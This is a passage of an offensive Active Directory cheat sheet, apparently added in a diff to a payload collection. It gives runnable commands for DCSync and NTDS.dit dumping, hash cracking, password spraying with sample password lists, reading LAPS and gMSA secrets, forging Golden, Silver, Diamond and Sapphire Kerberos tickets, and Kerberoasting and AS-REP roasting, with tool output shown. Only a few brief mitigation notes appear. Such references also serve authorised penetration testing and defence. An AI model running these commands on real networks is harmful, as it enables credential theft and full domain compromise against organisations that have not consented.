+ +* DCSync only one user + ```powershell + mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt + ``` +* DCSync all users of the domain + ```powershell + mimikatz# lsadump::dcsync /domain:htb.local /all /csv + + crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds + crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi + ``` + +> :warning: OPSEC NOTE: Replication is always done between 2 Computers. Doing a DCSync from a user account can raise alerts. + + +### Volume Shadow Copy + +The VSS is a Windows service that allows users to create snapshots or backups of their data at a specific point in time. Attackers can abuse this service to access and copy sensitive data, even if it is currently being used or locked by another process. + +* [windows-commands/vssadmin](https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/vssadmin) + ```powershell + vssadmin create shadow /for=C: + copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy + copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy + ``` +* [windows-commands/ntdsutil](https://learn.microsoft.com/fr-fr/troubleshoot/windows-server/identity/use-ntdsutil-manage-ad-files) + ```powershell + ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q + ``` +* [CrackMapExec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit) + ```powershell + cme smb 10.10.0.202 -u username -p password --ntds vss + ``` + + +### Extract hashes from ntds.dit + +then you need to use [secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) to extract the hashes, use the `LOCAL` options to use it on a retrieved ntds.dit + +```java +secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL +``` + +[secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) also works remotely + +```java 
+./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss -pwd-last-set -user-status +./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1 +``` + +* `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account. +* `-user-status`: Display whether or not the user is disabled. + + +### Using Mimikatz sekurlsa + +Dumps credential data in an Active Directory domain when run on a Domain Controller. +:warning: Requires administrator access with debug or Local SYSTEM rights + +```powershell +sekurlsa::krbtgt +lsadump::lsa /inject /name:krbtgt +``` + +### Crack NTLM hashes with hashcat + +Useful when you want to have the clear text password or when you need to make stats about weak passwords. + +Recommended wordlists: +- [Rockyou.txt](https://weakpass.com/wordlist/90) +- [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) +- [Weakpass.com](https://weakpass.com/) +- Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md) + +```powershell +# Basic wordlist +# (-O) will Optimize for 32 characters or less passwords +# (-w 4) will set the workload to "Insane" +$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r myrules.rule --opencl-device-types 1,2 + +# Generate a custom mask based on a wordlist +$ git clone https://github.com/iphelix/pack/blob/master/README +$ python2 statsgen.py ../hashcat.potfile -o hashcat.mask +$ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.hcmask +``` + +:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : +- [hashmob.net](https://hashmob.net) +- [crackstation.net](https://crackstation.net) +- [hashes.com](https://hashes.com/en/decrypt/hash) + + +### NTDS Reversible Encryption + 
+`UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED` ([0x00000080](http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm)), if this bit is set, the password for this user stored encrypted in the directory - but in a reversible form. + +The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin. +This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”. + +* List users with "Store passwords using reversible encryption" enabled + ```powershell + Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl + ``` + +The password retrieval is already handled by [SecureAuthCorp/secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) and mimikatz, it will be displayed as CLEARTEXT. + + +## User Hunting + +Sometimes you need to find a machine where a specific user is logged in. +You can remotely query every machines on the network to get a list of the users's sessions. + +* CrackMapExec + ```ps1 + cme smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions + SMB 10.10.10.10 445 WIN-8OJFTLMU1IG [+] Enumerated sessions + SMB 10.10.10.10 445 WIN-8OJFTLMU1IG \\10.10.10.10 User:Administrator + ``` +* Impacket Smbclient + ```ps1 + $ impacket-smbclient Administrator@10.10.10.10 + # who + host: \\10.10.10.10, user: Administrator, active: 1, idle: 0 + ``` +* PowerView Invoke-UserHunter + ```ps1 + # Find computers were a Domain Admin OR a specified user has a session + Invoke-UserHunter + Invoke-UserHunter -GroupName "RDPUsers" + Invoke-UserHunter -Stealth + ``` + + +## Password spraying + +Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. + +> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates. 
+ +Most of the time the best passwords to spray are : + +- `P@ssw0rd01`, `Password123`, `Password1`, `Hello123`, `mimikatz` +- `Welcome1`/`Welcome01` +- $Companyname1 :`$Microsoft1` +- SeasonYear : `Winter2019*`, `Spring2020!`, `Summer2018?`, `Summer2020`, `July2020!` +- Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#) +- Empty Password (Hash:31d6cfe0d16ae931b73c59d7e0c089c0) + + +### Kerberos pre-auth bruteforcing + +Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. + +> Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with specific logs to **Kerberos pre-authentication failure (4771)**. + +* Username bruteforce + ```powershell + root@kali:~$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt + ``` +* Password bruteforce + ```powershell + root@kali:~$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username + ``` +* Password spray + ```powershell + root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123 + root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt + root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log + ``` + +### Spray a pre-generated passwords list + +* Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. + ```powershell + crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` + ``` +* Using `DomainPasswordSpray` to spray a password against all users of a domain. + ```powershell + # https://github.com/dafthack/DomainPasswordSpray + Invoke-DomainPasswordSpray -Password Summer2021! + # /!\ be careful with the account lockout ! 
+ Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt + ``` +* Using `SMBAutoBrute`. + ```powershell + Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose + ``` + +### Spray passwords against the RDP service + +* Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services. + ```powershell + git clone https://github.com/xFreed0m/RDPassSpray + python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP] + ``` +* Using [hydra](https://github.com/vanhauser-thc/thc-hydra) and [ncrack](https://github.com/nmap/ncrack) to target RDP services. + ```powershell + hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10 + ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10 + ``` + +### BadPwdCount attribute + +> The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown. + +```powershell +$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users +LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: +LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: +``` + + +## Password in AD User comment + +```powershell +$ crackmapexec ldap domain.lab -u 'username' -p 'password' -M user-desc +$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users +GET-DESC... 10.0.2.11 389 dc01 [+] Found following users: +GET-DESC... 10.0.2.11 389 dc01 User: Guest description: Built-in account for guest access to the computer/domain +GET-DESC... 10.0.2.11 389 dc01 User: krbtgt description: Key Distribution Center Service Account +``` + +There are 3-4 fields that seem to be common in most AD schemas: `UserPassword`, `UnixUserPassword`, `unicodePwd` and `msSFU30Password`. 
+ +```powershell +enum4linux | grep -i desc + +Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID +``` + +or dump the Active Directory and `grep` the content. + +```powershell +ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/ +``` + + +## Password of Pre-Created Computer Account + +When `Assign this computer account as a pre-Windows 2000 computer` checkmark is checked, the password for the computer account becomes the same as the computer account in lowercase. For instance, the computer account **SERVERDEMO$** would have the password **serverdemo**. + +```ps1 +# Create a machine with default password +# must be run from a domain joined device connected to the domain +djoin /PROVISION /DOMAIN /MACHINE evilpc /SAVEFILE C:\temp\evilpc.txt /DEFPWD /PRINTBLOB /NETBIOS evilpc +``` + +* When you attempt to login using the credential you should have the following error code : `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT`. +* Then you need to change the password with [rpcchangepwd.py](https://github.com/SecureAuthCorp/impacket/pull/1304) + + +## Reading LAPS Password + +> Use LAPS to automatically manage local administrator passwords on domain joined computers so that passwords are unique on each managed computer, randomly generated, and securely stored in Active Directory infrastructure. + +### Determine if LAPS is installed + +```ps1 +Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll' +Get-FileHash 'c:\program files\LAPS\CSE\Admpwd.dll' +Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' +``` + +### Extract LAPS password + +> The "ms-mcs-AdmPwd" a "confidential" computer attribute that stores the clear-text LAPS password. 
Confidential attributes can only be viewed by Domain Admins by default, and unlike other attributes, is not accessible by Authenticated Users + + - From Windows: + + * adsisearcher (native binary on Windows 8+) + ```powershell + ([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { $_.properties} + ([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=MACHINE$))").findAll() | ForEach-Object { $_.properties} + ``` + + * [PowerView](https://github.com/PowerShellEmpire/PowerTools) + ```powershell + PS > Import-Module .\PowerView.ps1 + PS > Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime + ``` + + * [LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) + ```powershell + $ Get-LAPSComputers + ComputerName Password Expiration + ------------ -------- ---------- + example.domain.local dbZu7;vGaI)Y6w1L 02/21/2021 22:29:18 + + $ Find-LAPSDelegatedGroups + $ Find-AdmPwdExtendedRights + ``` + + * Powershell AdmPwd.PS + ```powershell + foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}} + ``` + + - From Linux: + + * [pyLAPS](https://github.com/p0dalirius/pyLAPS) to **read** and **write** LAPS passwords: + ```bash + # Read the password of all computers + ./pyLAPS.py --action get -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1 + # Write a random password to a specific computer + ./pyLAPS.py --action set --computer 'PC01$' -u 'Administrator' -d 'LAB.local' -p 'Admin123!' 
--dc-ip 192.168.2.1 + ``` + + * [CrackMapExec](https://github.com/mpgn/CrackMapExec): + ```bash + crackmapexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps + ``` + + * [LAPSDumper](https://github.com/n00py/LAPSDumper) + ```bash + python laps.py -u 'user' -p 'password' -d 'domain.local' + python laps.py -u 'user' -p 'e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c' -d 'domain.local' -l 'dc01.domain.local' + ``` + + * ldapsearch + ```bash + ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd` + ``` + +### Grant LAPS Access +The members of the group **"Account Operator"** can add and modify all the non admin users and groups. Since **LAPS ADM** and **LAPS READ** are considered as non admin groups, it's possible to add an user to them, and read the LAPS admin password + +```ps1 +Add-DomainGroupMember -Identity 'LAPS ADM' -Members 'user1' -Credential $cred -Domain "domain.local" +Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -Domain "domain.local" +``` + + +## Reading GMSA Password + +> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically rotated every 30 days to a randomly generated password of 256 bytes. + +### GMSA Attributes in the Active Directory +* `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password. +* `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts. +* `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA. 
+* `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA. + + +### Extract NT hash from the Active Directory + +* [mpgn/CrackMapExec](https://github.com/mpgn/CrackMapExec) + ```ps1 + # Use --lsa to get GMSA ID + crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-convert-id 00[...]99 + crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-decrypt-lsa '_SC_GMSA_{[...]}_.....' + ``` + +* [rvazarkar/GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) + ```ps1 + GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT + ``` + +* [micahvandeusen/gMSADumper](https://github.com/micahvandeusen/gMSADumper) + ```powershell + python3 gMSADumper.py -u User -p Password1 -d domain.local + ``` + +* Active Directory Powershell + ```ps1 + $gmsa = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword' + $blob = $gmsa.'msDS-ManagedPassword' + $mp = ConvertFrom-ADManagedPasswordBlob $blob + $hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword + ``` + +* [kdejoyce/gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module + + +## Forging Golden GMSA + +> One notable difference between a **Golden Ticket** attack and the **Golden GMSA** attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it. + +:warning: You can't "force reset" a gMSA password, because a gMSA's password never changes. The password is derived from the KDS root key and `ManagedPasswordIntervalInDays`, so every Domain Controller can at any time compute what the password is, what it used to be, and what it will be at any point in the future. 
+ +* Using [GoldenGMSA](https://github.com/Semperis/GoldenGMSA) + ```ps1 + # Enumerate all gMSAs + GoldenGMSA.exe gmsainfo + # Query for a specific gMSA + GoldenGMSA.exe gmsainfo --sid S-1-5-21-1437000690-1664695696-1586295871-1112 + + # Dump all KDS Root Keys + GoldenGMSA.exe kdsinfo + # Dump a specific KDS Root Key + GoldenGMSA.exe kdsinfo --guid 46e5b8b9-ca57-01e6-e8b9-fbb267e4adeb + + # Compute gMSA password + # --sid : SID of the gMSA (required) + # --kdskey : Base64 encoded KDS Root Key + # --pwdid : Base64 of msds-ManagedPasswordID attribute value + GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 # requires privileged access to the domain + GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45UZXyuYB[...]G2/M= # requires LDAP access + GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45U[...]SM0R7djG2/M= --pwdid AQAAA[..]AAA # Offline mode + ``` + +## Kerberos Tickets + +Tickets are used to grant access to network resources. A ticket is a data structure that contains information about the user's identity, the network service or resource being accessed, and the permissions or privileges associated with that resource. Kerberos tickets have a limited lifetime and expire after a set period of time, typically 8 to 12 hours. + +There are two types of tickets in Kerberos: + +* **Ticket Granting Ticket** (TGT): The TGT is obtained by the user during the initial authentication process. It is used to request additional service tickets without requiring the user to re-enter their credentials. The TGT contains the user's identity, a timestamp, and an encryption of the user's secret key. + +* **Service Ticket** (ST): The service ticket is used to access a specific network service or resource. The user presents the service ticket to the service or resource, which then uses the ticket to authenticate the user and grant access to the requested resource. 
The service ticket contains the user's identity, a timestamp, and an encryption of the service's secret key. + + +### Dump Kerberos Tickets + +* Mimikatz: `sekurlsa::tickets /export` +* Rubeus + ```ps1 + # List available tickets + Rubeus.exe triage + + # Dump one ticket, the output is in Kirbi format + Rubeus.exe dump /luid:0x12d1f7 + ``` + +### Replay Kerberos Tickets + +* Mimikatz: `mimikatz.exe "kerberos::ptc C:\temp\TGT_Administrator@lab.local.ccache"` +* CrackMapExec: `KRB5CCNAME=/tmp/administrator.ccache crackmapexec smb 10.10.10 -u user --use-kcache` + + +### Convert Kerberos Tickets + +In the Kerberos authentication protocol, ccache and kirbi are two types of Kerberos credential caches that are used to store Kerberos tickets. + +* A credential cache, or `"ccache"` is a temporary storage area for Kerberos tickets that are obtained during the authentication process. The ccache contains the user's authentication credentials and is used to access network resources without having to re-enter the user's credentials for each request. + +* The Kerberos Integrated Windows Authentication (KIWA) protocol used by Microsoft Windows systems also makes use of a credential cache called a `"kirbi"` cache. The kirbi cache is similar to the ccache used by standard Kerberos implementations, but with some differences in the way it is structured and managed. + +While both caches serve the same basic purpose of storing Kerberos tickets to enable efficient access to network resources, they differ in format and structure. You can convert them easily using: + +* kekeo: `misc::convert ccache ticket.kirbi` +* impacket: `impacket-ticketConverter SRV01.kirbi SRV01.ccache` + + +### Pass-the-Ticket Golden Tickets + +Forging a TGT require: +* the `krbtgt` NT hash +* since recently, we cannot use a non-existent account name as a result of `CVE-2021-42287` mitigations + +> The way to forge a Golden Ticket is very similar to the Silver Ticket one. 
The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt NT hash must be used. + +#### Using Mimikatz + +```powershell +# Get info - Mimikatz +lsadump::lsa /inject /name:krbtgt +lsadump::lsa /patch +lsadump::trust /patch +lsadump::dcsync /user:krbtgt + +# Forge a Golden ticket - Mimikatz +kerberos::purge +kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt +kerberos::tgt +``` + +#### Using Meterpreter + +```powershell +# Get info - Meterpreter(kiwi) +dcsync_ntlm krbtgt +dcsync krbtgt + +# Forge a Golden ticket - Meterpreter +load kiwi +golden_ticket_create -d -k -s -u -t +golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck +kerberos_ticket_purge +kerberos_ticket_use /root/Downloads/pentestlabuser.tck +kerberos_ticket_list +``` + +#### Using a ticket on Linux + +```powershell +# Convert the ticket kirbi to ccache with kekeo +misc::convert ccache ticket.kirbi + +# Alternatively you can use ticketer from Impacket +./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da + +ticketer.py -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519 +./ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519 + +export KRB5CCNAME=/home/user/ticket.ccache +cat $KRB5CCNAME + +# NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file +./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 +``` + +If you need to swap ticket between Windows and Linux, you need to convert them with 
`ticket_converter` or `kekeo`. + +```powershell +root@kali:ticket_converter$ python ticket_converter.py velociraptor.ccache velociraptor.kirbi +Converting ccache => kirbi +root@kali:ticket_converter$ python ticket_converter.py velociraptor.kirbi velociraptor.ccache +Converting kirbi => ccache +``` + + +Mitigations: +* Hard to detect because they are legit TGT tickets +* Mimikatz generate a golden ticket with a life-span of 10 years + + +### Pass-the-Ticket Silver Tickets + +Forging a Service Ticket (ST) require machine account password (key) or NT hash of the service account. + +```powershell +# Create a ticket for the service +mimikatz $ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE + +# Examples +mimikatz $ /kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt +mimikatz $ kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park + +# Then use the same steps as a Golden ticket +mimikatz $ misc::convert ccache ticket.kirbi + +root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache +root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 +``` + +Interesting services to target with a silver ticket : + +| Service Type | Service Silver Tickets | Attack | +|---------------------------------------------|------------------------|--------| +| WMI | HOST + RPCSS | `wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"` | +| PowerShell Remoting | CIFS + HTTP + (wsman?) 
| `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` | +| WinRM | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` | +| Scheduled Tasks | HOST | `schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"` | +| Windows File Share (CIFS) | CIFS | `dir \\dc01\c$` | +| LDAP operations including Mimikatz DCSync | LDAP | `lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt` | +| Windows Remote Server Administration Tools | RPCSS + LDAP + CIFS | / | + + +Mitigations: +* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket. + + +### Pass-the-Ticket Diamond Tickets + +> Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key + +Require: +* krbtgt NT Hash +* krbtgt AES key + +```ps1 +ticketer.py -request -domain 'lab.local' -user 'domain_user' -password 'password' -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser' + +Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:USER_ID /groups:GROUP_IDS +``` + + +### Pass-the-Ticket Sapphire Tickets + +> Requesting the target user's PAC with `S4U2self+U2U` exchange during TGS-REQ(P) (PKINIT). + +The goal is to mimic the PAC field as close as possible to a legitimate one. + +Require: +* [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411) +* krbtgt AES key + +```ps1 +# baduser argument will be ignored +ticketer.py -request -impersonate 'domain_adm' -domain 'lab.local' -user 'domain_user' -password 'password' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' 'baduser' +``` + + +## Kerberoasting + +> "A service principal name (SPN) is a unique identifier of a service instance. 
SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) + +Any valid domain user can request a kerberos ticket (ST) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. + + +* [GetUserSPNs](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py) from Impacket Suite + ```powershell + $ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request + + Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies + + ServicePrincipalName Name MemberOf PasswordLastSet LastLogon + -------------------- ------------- -------------------------------------------------------- ------------------- ------------------- + active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40 2018-12-03 17:11:11 + + $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43[...]84fd2 + ``` + +* CrackMapExec Module + ```powershell + $ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt + LDAP 10.0.2.11 389 dc01 [*] Windows 10.0 Build 17763 x64 (name:dc01) (domain:lab.local) (signing:True) (SMBv1:False) + LDAP 10.0.2.11 389 dc01 $krb5tgs$23$*john.doe$lab.local$MSSQLSvc/dc01.lab.local~1433*$efea32[...]49a5e82$b28fc61[...]f800f6dcd259ea1fca8f9 + ``` + +* [Rubeus](https://github.com/GhostPack/Rubeus) + ```powershell + # Stats + Rubeus.exe kerberoast /stats + ------------------------------------- ---------------------------------- + | Supported Encryption Type | Count | | Password Last Set Year | Count | + ------------------------------------- ---------------------------------- + | RC4_HMAC_DEFAULT | 1 | | 2021 | 1 | + ------------------------------------- 
---------------------------------- + + # Kerberoast (RC4 ticket) + Rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt + + # Kerberoast (AES ticket) + # Accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested. + Rubeus.exe kerberoast /tgtdeleg + + # Kerberoast (RC4 ticket) + # The tgtdeleg trick is used, and accounts without AES enabled are enumerated and roasted. + Rubeus.exe kerberoast /rc4opsec + ``` + +* [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) + ```powershell + Request-SPNTicket -SPN "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local" + ``` + +* [bifrost](https://github.com/its-a-feature/bifrost) on **macOS** machine + ```powershell + ./bifrost -action asktgs -ticket doIF<...snip...>QUw= -service host/dc1-lab.lab.local -kerberoast true + ``` + +* [targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast) + ```powershell + # for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), + # print the "kerberoast" hash, and delete the temporary SPN set for that operation + targetedKerberoast.py [-h] [-v] [-q] [-D TARGET_DOMAIN] [-U USERS_FILE] [--request-user username] [-o OUTPUT_FILE] [--use-ldaps] [--only-abuse] [--no-abuse] [--dc-ip ip address] [-d DOMAIN] [-u USER] [-k] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] + ``` + + +Then crack the ticket using the correct hashcat mode (`$krb5tgs$23`= `etype 23`) + +| Mode | Description | +|---------|--------------| +| `13100` | Kerberos 5 TGS-REP etype 23 (RC4) | +| `19600` | Kerberos 5 TGS-REP etype 17 (AES128-CTS-HMAC-SHA1-96) | +| `19700` | Kerberos 5 TGS-REP etype 18 (AES256-CTS-HMAC-SHA1-96) | + +```powershell +./hashcat -m 13100 -a 0 kerberos_hashes.txt crackstation.txt +./john --wordlist=/opt/wordlists/rockyou.txt --fork=4 --format=krb5tgs ~/kerberos_hashes.txt +``` + + +Mitigations: +* Have a very long 
password for your accounts with SPNs (> 32 characters) +* Make sure no users have SPNs + +## KRB_AS_REP Roasting + +> If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting + +**Requirements**: +- Accounts with the attribute **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`) + +* [Rubeus](https://github.com/GhostPack/Rubeus) + ```powershell + C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast + [*] Action: AS-REP roasting + [*] Target User : TestOU3user + [*] Target Domain : testlab.local + [*] SamAccountName : TestOU3user + [*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local + [*] Using domain controller: testlab.local (192.168.52.100) + [*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user' + [*] Connecting to 192.168.52.100:88 + [*] Sent 169 bytes + [*] Received 1437 bytes + [+] AS-REQ w/o preauth successful! + [*] AS-REP hash: + + $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)... 
